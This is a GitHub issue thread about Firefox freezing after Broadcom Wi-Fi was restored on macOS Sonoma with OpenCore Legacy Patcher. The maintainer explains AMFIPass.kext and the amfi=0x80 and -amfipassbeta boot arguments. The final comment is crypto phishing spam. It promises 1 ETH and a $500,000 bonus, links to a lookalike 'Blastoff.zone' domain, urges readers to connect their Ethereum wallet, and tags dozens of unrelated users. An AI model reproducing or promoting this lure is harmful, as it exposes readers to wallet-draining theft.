### ISSUE TITLE
Wifi is ok but firefox freezed or slow

### ISSUE THREAD

**Issue by eqcq** [perez987/Broadcom-wifi-back-on-macOS-Sonoma-with-OCLP#2]
Hi and thanks a lot. Now wifi is back but all the firefox browsers are down. Ive uninstall them, redownload etc …
I have Sonoma 14.4

**Comment by perez987** [comment]
@eqcq 
Are you using AMFIPass.kext?

**Comment by eqcq** [comment]
Hi ! With your question you drive me to the issue :)

I’ve replaced amfi=0x80 by -amfipassbeta and everything seems working like a charm. Thx!

Guillaume Pascale
www.errorishuman.com

**Comment by perez987** [comment]
@eqcq 
Guillaume, glad to read that the issue has been fixed.
2 things to have in account:

1. `amfi=0x80` in boot args without AMFIPass.kext or AMFIPAss.kext without `amfi=0x80` boot arg, one of the 2 options
2. [AMFIPass.kext 1.4.0](https://github.com/dortania/OpenCore-Legacy-Patcher/tree/main/payloads/Kexts/Acidanthera) doesn't need `-amfipassbeta` boot arg any more (AMFIPAss.kext 1.3.1 does need `-amfipassbeta`).

Bonne nuit.

**Comment by swdthomas** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500,000 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this chance before it's too late!
anxiouscomputer, @gdn0101, @guozhe001, @openainext, @shreyanshp, @LightTemplar, @semsphy, @abbymaea, @cfelicio, @tristanhcole, @adhirajb1109, @vafanassieff, @acto-felix, @pranavnt, @raidensakura, @Sh4dowNight, @FcknPerfect, @Im4smutiaraw, @Nazdroth, @imyelo, @Sebidev, @mcnaveen, @daviddahl, @hackedunit, @sehyunchung, @leuro, @LockonS, @jmmanos, @EliothMonroy, @Maxwelltoo, @Bulko1, @herveGuigoz, @AVerdaasdonk, @quiint, @hasnhasan, @Hampe-tech, @mrkaqz, @fitrh, @cryptedbv, @jemjemgaldones, @psxx, @JamesTsetsekas, @laisangbum, @dorucioclea, @Krychaz, @felixseblanc, @alexaf2000, @idk4385, @byteshiva, @onixiya1337
